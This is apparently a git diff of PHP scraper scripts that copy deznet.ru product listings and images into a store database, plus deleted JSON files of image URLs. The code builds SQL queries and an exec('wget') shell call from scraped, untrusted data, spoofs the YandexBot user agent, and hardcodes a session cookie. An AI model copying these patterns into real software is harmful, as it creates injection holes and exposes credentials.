$id=DB::getValue("SELECT `id` FROM `sm2` WHERE `link` LIKE '%" . $link . "' LIMIT 1");
if (!$id)DB::add("INSERT INTO `sm2` (`link`, `status`) VALUES (?, ?)", array($link, 1));
}
}
function get_page($link){
$agent = 'Mozilla/5.0 (compatible; YandexBot/3.0)';
$ch = curl_init($link);
//curl_setopt($ch, CURLOPT_REFERER, 'https://www.samsonopt.ru');
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($ch, CURLOPT_TIMEOUT, 20); //timeout in seconds
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$dir = dirname(__FILE__);
$config['cookie_file'] = $dir . '/cookies/' . md5(@$_SERVER['REMOTE_ADDR']) . '.txt';
curl_setopt($ch, CURLOPT_COOKIEFILE, $config['cookie_file']);
curl_setopt($ch, CURLOPT_COOKIEJAR, $config['cookie_file']);
curl_setopt($ch, CURLOPT_COOKIE, "PMBC=96152e8e9a0168a731539c5e52c6b39a; PHPSESSID=jl0i13pn3157qca807jgp0jqa7; ServerName=WoW+Circle+3.3.5a+x5; serverId=1");
// curl_setopt($ch, CURLOPT_PROXY, 'localhost:9050'); // Use if proxy have username and password
// curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
$response_data = curl_exec($ch);
if (curl_errno($ch) > 0) {
die('Ошибка curl: ' . curl_error($ch));
}
curl_close($ch);
return $response_data;
}
//exec ("php /home/cloud/core/parcer/r2.php");
//DELETE FROM table WHERE id NOT IN (SELECT max(id) FROM table GROUP BY name HAVING count(id)>1)
//DELETE FROM `sm` WHERE `id` NOT IN (SELECT max(`id`) FROM `sm` GROUP BY `link` HAVING count(`id`)>1)`status`=1 AND
$LinkList = DB::getAll( 'SELECT * FROM `sm2` WHERE `link` NOT LIKE "%.jpg" ORDER BY RAND() LIMIT 300');
for ($i=0; $i<count( $LinkList ); $i++){
if (findtxt($LinkList[$i]['link'], 'https://www.deznet.ru')==0) $LinkList[$i]['link']= 'https://www.deznet.ru' . $LinkList[$i]['link'];
$html=get_page($LinkList[$i]['link']);
if ($html) {
add_link($html);
DB::set("UPDATE `sm2` SET `status`=1 WHERE `id`=?", $LinkList[$i]['id']);
}
unset($html);
//sleep(3);
}
?>

102
parcer/desnet_html.php Executable file
View File

@ -0,0 +1,102 @@
<?php
$_SERVER['SERVER_NAME']='tk-ligat.ru';
require_once('/home/cloud/core/set/tk-ligat.ru.php');
require_once('/home/cloud/core/api/php/db.php');
require_once('/home/cloud/core/api/php/json.php');
function leopak ($text) {
$old1 = array("\\");
$new1 = array("/");
$text = str_replace($old1, $new1, $text);
return $text;
}
/* ищет str в txt если находит, возвращает единичку */
function findtxt($txt, $str){
$pos1 = stripos($txt, $str);
if ($pos1 === false)
return 0;
else
return 1;
}
function add_link($html){
preg_match_all("/<[Aa][\s]{1}[^>]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\s]*([^ \"'>\s#]+)[^>]*>/", $html, $matches);
$urls = $matches[1]; // Берём то место, где сама ссылка (благодаря группирующим скобкам в регулярном выражении)
/* Выводим все ссылки */
for ($j = 0; $j < count($urls); $j++){
$link=$urls[$j];
if (findtxt($link, 'https://www.deznet.ru')==0) $link = 'https://www.deznet.ru' . leopak($link);
$id=DB::getValue("SELECT `id` FROM `sm2` WHERE `link` LIKE '%" . $link . "' LIMIT 1");
if (!$id)DB::add("INSERT INTO `sm2` (`link`, `status`) VALUES (?, ?)", array($link, 1));
}
}
function get_page($link){
$agent = 'Mozilla/5.0 (compatible; YandexBot/3.0)';
$ch = curl_init($link);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
curl_setopt($ch, CURLOPT_TIMEOUT, 20); //timeout in seconds
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$dir = dirname(__FILE__);
$config['cookie_file'] = $dir . '/cookies/' . md5(@$_SERVER['REMOTE_ADDR']) . '.txt';
curl_setopt($ch, CURLOPT_COOKIEFILE, $config['cookie_file']);
curl_setopt($ch, CURLOPT_COOKIEJAR, $config['cookie_file']);
curl_setopt($ch, CURLOPT_COOKIE, "PMBC=96152e8e9a0168a731539c5e52c6b39a; PHPSESSID=jl0i13pn3157qca807jgp0jqa7; ServerName=WoW+Circle+3.3.5a+x5; serverId=1");
// curl_setopt($ch, CURLOPT_PROXY, 'localhost:9050'); // Use if proxy have username and password
// curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
$response_data = curl_exec($ch);
if (curl_errno($ch) > 0) die('Ошибка curl: ' . curl_error($ch));
curl_close($ch);
return $response_data;
}
$LinkList = DB::getAll( "SELECT * FROM `sm2` WHERE `html` IS NULL AND `status`=1 AND (
`link` LIKE 'https://www.deznet.ru/catalog/%0/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%1/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%2/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%3/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%4/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%5/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%6/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%7/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%8/' OR
`link` LIKE 'https://www.deznet.ru/catalog/%9/'
) ORDER BY RAND() LIMIT 300");
for ($i=0; $i<count( $LinkList ); $i++){
//if (findtxt($LinkList[$i]['link'], 'https://www.deznet.ru')==0) $LinkList[$i]['link']= 'https://www.deznet.ru' . $LinkList[$i]['link'];
$html=get_page($LinkList[$i]['link']);
//echo $LinkList[$i]['html'];
//echo $html;
if ($html) {
add_link($html);
$html=base64_encode(gzcompress ( $html, 9));
echo $html;
$md5=md5($html);
DB::set("UPDATE `sm2` SET `status`=0, `html`=?, `md5`=? WHERE `id`=?", array($html, $md5, $LinkList[$i]['id']));
}
unset($html);
}
//ищем дубли....
/*
unset($LinkList);
$LinkList = DB::getAll( 'SELECT * FROM `sm2` WHERE `md5` IS NULL');
for ($i=0; $i<count( $LinkList ); $i++){
DB::set("DELETE FROM `sm2` WHERE `link`=?", $LinkList[$i]['link']);
$link=leopak( $LinkList[$i]['link'] );
DB::add("INSERT INTO `sm2` (`link`, `status`) VALUES (?, ?)", array($LinkList[$i]['link'], 1));
}
*/
?>

119
parcer/desnet_parce.php Executable file
View File

@ -0,0 +1,119 @@
<?php
ini_set( 'display_errors', 0 );
$_SERVER['SERVER_NAME']='tk-ligat.ru';
require_once('/home/cloud/core/set/tk-ligat.ru.php');
require_once('/home/cloud/core/api/php/db.php');
require_once('/home/cloud/core/api/php/json.php');
function html_to_obj($html) {
$dom = new DOMDocument();
// $dom->loadHTML($html);
@$dom->loadHTML(mb_convert_encoding(@$html, 'HTML-ENTITIES', 'UTF-8'));
return element_to_obj($dom->documentElement);
}
function element_to_obj($element) {
@$obj = array( "tag" => @$element->tagName );
foreach (@$element->attributes as $attribute) {
$obj[$attribute->name] = $attribute->value;
}
foreach ($element->childNodes as $subElement) {
if ($subElement->nodeType == XML_TEXT_NODE) {
$obj["html"] = $subElement->wholeText;
}
else {
$obj["children"][] = element_to_obj($subElement);
}
}
return $obj;
}
function leopak ($text) {
$old1 = array("\\");
$new1 = array("/");
$text = str_replace($old1, $new1, $text);
return $text;
}
/* ищет str в txt если находит, возвращает единичку */
function findtxt($txt, $str){
$pos1 = stripos($txt, $str);
if ($pos1 === false) return 0;
else
return 1;
}
function add_link($html){
preg_match_all("/<[Aa][\s]{1}[^>]*[Hh][Rr][Ee][Ff][^=]*=[ '\"\s]*([^ \"'>\s#]+)[^>]*>/", $html, $matches);
$urls = $matches[1]; // Берём то место, где сама ссылка (благодаря группирующим скобкам в регулярном выражении)
/* Выводим все ссылки */
for ($j = 0; $j < count($urls); $j++){
$link=$urls[$j];
if (findtxt($link, 'https://www.deznet.ru')==0) $link = 'https://www.deznet.ru' . leopak($link);
$id=DB::getValue("SELECT `id` FROM `sm2` WHERE `link` LIKE '%" . $link . "' LIMIT 1");
if (!$id)DB::add("INSERT INTO `sm2` (`link`, `status`) VALUES (?, ?)", array($link, 1));
}
}
function generate_password($number){
$arr = array('a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','r','s','t','u','v','x','y','z','1','2','3','4','5','6','7','8','9','0');
$pass = "";
for($i = 0; $i < $number; $i++){
$index = rand(0, count($arr) - 1);
$pass .= $arr[$index];
}
return $pass;
}
$LinkList = DB::getAll( "SELECT * FROM `sm2` WHERE `add` IS NULL AND`html` IS NOT NULL");
for ($i=0; $i<count( $LinkList ); $i++){
$html=gzuncompress ( base64_decode ( $LinkList[$i]['html'] ) );
$a = html_to_obj($html);
$title = $a['children'][1]['children'][9]['children'][5]['children'][0]['children'][1]['children'][0]['children'][0]['children'][0]['children'][8]['children'][1]['children'][0]['html'];
$txt = $a['children'][1]['children'][9]['children'][5]['children'][0]['children'][3]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][2]['children'][0]['children'][3]['content'] ;
$code = $a['children'][1]['children'][9]['children'][5]['children'][0]['children'][3]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][2]['children'][0]['children'][4]['content'] ;
$img = $a['children'][1]['children'][9]['children'][5]['children'][0]['children'][3]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][2]['children'][0]['children'][5]['children'][0]['children'][0]['children'][0]['children'][0]['href'] ;
$artikul = $a['children'][1]['children'][9]['children'][5]['children'][0]['children'][3]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][0]['children'][2]['children'][0]['children'][5]['children'][1]['children'][0]['children'][0]['children'][1]['children'][0]['children'][1]['children'][0]['children'][1]['html'] ;
$partner = "deznet";
unset($html);
echo $title . "\n";
if ($title){
//Узнаем ли есть ли такой товар в БД
$id=DB::getValue("SELECT `id` FROM `tovar` WHERE `title`=? AND `code`=? AND `partner`=?", array($title, $code, $partner));
if (!$id){
$tovar_id = DB::add( "INSERT INTO `tovar` (`title`, `txt`, `code`, `artikul`, `partner`, `linkimg`, `status`, `category`) VALUES (?, ?, ?, ?, ?, ?, 1, 0)", array( $title, nl2br($txt), $code, $artikul, $partner, $img ) );
$filename=generate_password(30);
echo $img . "\n";
exec("wget https://www.deznet.ru" . $img . " -O /home/cloud/core/img/tk-ligat.ru/tovar/" . $filename . ".jpg");
DB::add("INSERT INTO `tovar_img` (`filename`, `tovar_id`) VALUES (?, ?)", array( $filename, $tovar_id ) );
DB::set("UPDATE `sm2` SET `add`=1 WHERE `id`=?", $LinkList[$i]['html']);
}
unset($id);
unset($title);
unset($txt);
unset($code);
unset($img);
unset($artikil);
}
}
//sleep(120);
//exec ('php desnet_parce.php > 2/1.txt')
?>

61
parcer/findfiles.php Executable file
View File

@ -0,0 +1,61 @@
<?php
/*
Ищем файлы, которых нет в БД
*/
$_SERVER['SERVER_NAME']='tk-ligat.ru';
function list_file ( $dir ){
if ( $dir [ strlen( $dir ) - 1 ] != '/' ){
$dir .= '/';
}
$nDir = opendir( $dir );
while ( false !== ( $file = readdir( $nDir ) ) )
{
if ( $file != "." AND $file != ".." ){
if ( !is_dir( $dir . $file ) ){
$files [] = $file;
}
}
}
closedir( $nDir );
return $files;
}
function leopak ($text) {
$old1 = array(".jpg", ".png");
$new1 = array("", "");
$text = str_replace($old1, $new1, $text);
return $text;
}
require_once('/home/cloud/core/set/tk-ligat.ru.php');
require_once('/home/cloud/core/api/php/db.php');
$allImg=list_file('/home/cloud/core/img/tk-ligat.ru/tovar');
//print_r($allImg);
$j=0;
for ($i=0; $i<count($allImg); $i++){
$filename=leopak($allImg[$i]);
unset($id);
$id=DB::getValue("SELECT `id` FROM `tovar_img` WHERE `filename`=? LIMIT 1", $filename);
//echo "Текущий ИД: " . $id . "\n";
if (!$id){
unlink('/home/cloud/core/img/tk-ligat.ru/tovar/' . $allImg[$i]);
echo 'Удалено: /home/cloud/core/img/tk-ligat.ru/tovar/' . $allImg[$i] . "\n";
$j++;
sleep(1);
}
$r=(int)count($allImg)-$i;
echo "Осталось: " . $r . "\n";
}
echo "Всего файлов: " . count($allImg) . "\n";
echo "Удалено: " . $j . "\n";
/* обратный процесс - идем по БД сверяем MD5 потом кильнем то где нет md5*/
$tovar_img=DB::getAll("SELECT `id`, `filename`, `tip` FROM `tovar_img`");
for ($i=0; $i<count($tovar_img); $i++){
$md5=md5_file("/home/cloud/core/img/tk-ligat.ru/tovar/" . $tovar_img[$i]['filename'] . '.' . $tovar_img[$i]['tip']);
DB::set("UPDATE `tovar_img` SET `md5`=? WHERE `id`=?", array($md5, $tovar_img[$i]['id']));
}
?>

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100264\/16ebfaa794fc79226367d9dba9e3a1f2_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100264\/1ff047b3c31719ae84b6d324f411e7bb_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100327\/681d7da91c038a1fced3f23fbc050ef8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100327\/52fb344c66fb7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100327\/4e85b6fd20a2c_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100329\/ffaefdc5b8ad35bb5af24b5643428947_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100329\/52fb4a6e031d8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100329\/4e85b6fd26fbd_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100329\/50c13c7ee215bbe3c548e94e0a6c24a2_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100337\/cfa90532588c7ec1ddafb4075844c165_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100337\/52fb4b1075661_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100337\/4e85b6fd2d166_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100767\/52fc64cd52128_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100767\/4e85b6fd7f5cf_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/100876\/6a4943632f900779df6a6259ddc04a12_xl.jpg","https:\/\/s3.ibta.ru\/goods\/100876\/0b76ebc100e2330198003f7ed02e0c90_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101294\/c2a8144e5d7aaa53ebe8d98bc6fdc1c3_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101294\/4e85b6fe0fcc4_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101294\/52fb4c1527409_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101443\/d82d05f1309c2cf38f18f56e6619b218_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101443\/21fa2fd36ff79a9f07bbe0a54ba3a1d7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101443\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101443\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101444\/a81cbff1a2a817d5e9391fc88745eb6c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101444\/b56f17f697507279cb831444262561c5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101444\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101444\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101491\/4e85b6fe784a8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101491\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101491\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101503\/4e85b6fe9f990_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101503\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101503\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101505\/4e85b6fea5710_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101505\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101505\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101753\/e81799a520199e4a583fc33801683d11_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101753\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101753\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101754\/4e85b6ff0d9a4_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101754\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101754\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101785\/a59cac52cfd2d0e5cb9f48d83f9d2e8c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101785\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101785\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
"https:\/\/s3.ibta.ru\/goods\/101826\/cc00e38920db41b711c059159245857e_xl.jpg"

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101840\/4e85b6ffbd5e8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101840\/52fb4e3fc31aa_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101843\/52fb4e85e6a27_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101843\/e65070b089b4af84dc8171d16ee4c365_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101843\/31100b7cf9bc191ca08ac6793c93eecc_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101843\/101b858661c2734f424e9d14b7122c4d_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101886\/06f70bac4f447f3b5e2f9b1162391ec5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101886\/1252b118531cafb388599796d2bd91b7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101886\/e760d5b403256c823eae0cdc3e86576a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101886\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101886\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101887\/f4dcb122e7f8a463158916e8e57a1764_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101887\/d7ee53624124098119f45b23db041afc_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101887\/b60626f94a64b53132802ecf9ff0999a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101887\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101887\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101888\/b70ec96d51cd15039d9fdfc5b23ee526_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101888\/84715654ff66e2995ed6900d39fb7bfb_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101888\/bf7dbf586510aded83aae410f75aac8d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101888\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101888\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101889\/4fc4c17cb55358902ddede5732e9e59b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101889\/b4ef171666219904a00c9b0f07c2e924_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101889\/165fbfd47d9198ec067697588b2bf8ad_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101889\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101889\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/101890\/c344f07726bdb3eb4344ea552bda1ee2_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101890\/6b2b306fca50ba1c6805f521ef22bc4e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101890\/c59fc06c15afa55af733c57c3e0a755b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101890\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/101890\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102074\/4e85b700f069c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102074\/533bec6270c60_xl.jpg"]

View File

@ -1 +0,0 @@
"https:\/\/s3.ibta.ru\/goods\/102120\/a22a710d7b7a1fb15a8e4cfa5060eac5_xl.jpg"

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102252\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102252\/31d4827da8d0efa0ac08a3fd1b1e758a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102252\/913e14bf7b61e38fc7f579f59b034b1e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102252\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102252\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102253\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102253\/84b5e92def7f773991e3d54492ff30e4_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102253\/d67ed4cbd0475f26281b75249b6eacf5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102253\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102253\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102254\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102254\/f11d5ed6162d56b0133ffdd0210a06dd_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102254\/fed7f26d6d20beb58959cb49cdefc27d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102254\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102254\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102255\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102255\/111f995db8e2fd89ab9687684b9cc53a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102255\/913e14bf7b61e38fc7f579f59b034b1e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102255\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102255\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102256\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102256\/f2f77b8d5f159d8e1c98a86ecb8b1d9e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102256\/fed7f26d6d20beb58959cb49cdefc27d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102256\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102256\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102257\/c1e2b6a47a67b37b5380e324707c0d37_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102257\/ab50d367f447531dcab2b267d9056a6b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102257\/913e14bf7b61e38fc7f579f59b034b1e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102257\/ad34bd276e8db53f82f59ca187ea04b9_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102257\/7b9708521771c130b0b0db8024d06b81_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102364\/4e85b70300ea5_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102364\/52fc7d9ab242d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102364\/e4d1d8ad219e0c844a95fd23e4c31f83_xl.jpg"]

View File

@ -1 +0,0 @@
"https:\/\/s3.ibta.ru\/goods\/102772\/4e9e8e0fb4fb6_xl.jpg"

View File

@ -1 +0,0 @@
"https:\/\/s3.ibta.ru\/goods\/102773\/4e9e96655305c_xl.jpg"

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102818\/f6c9f3914b5295b35ac60e5a3944dc91_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102818\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102818\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102830\/e0ce9963f4c8aa4cd8640fb1d5446804_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102830\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102830\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102831\/4fc33127a7b1c_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102831\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102831\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102832\/88ab57214bc526cd6bfb3cafa6f682e6_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/7e8286036f431c596ea2fb4d580131af_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/cdbb0b78da97513900a1e59de0a358ac_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/5afefa2f20581d331757754bb7f84225_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/1a7f5d2e9ea91a478bf8f64cdd7813d8_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/f12a991a6412c804a8474e9717ddad9d_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102832\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102834\/32bd1495018d293913c3fc3bfb6f306b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/966e5ec836e8a244aaf44429642f8d6b_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/2f5fb2e37feccaeef3b22aad15595b4a_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/9451235d862000035b21c23fa1e2eb02_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/eaef3585998abc8181df665f0be46a8e_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/28f28d06775cb42c5e82ca0ca0cd1ab2_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102834\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
["https:\/\/s3.ibta.ru\/goods\/102848\/d001dae3c3973f4d8bb23dd359dade19_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102848\/b3a557a53fcfc599776e2b2c5d73a3e7_xl.jpg","https:\/\/s3.ibta.ru\/goods\/102848\/2df83ab683b06ceefae5f9f192781242_xl.jpg"]

View File

@ -1 +0,0 @@
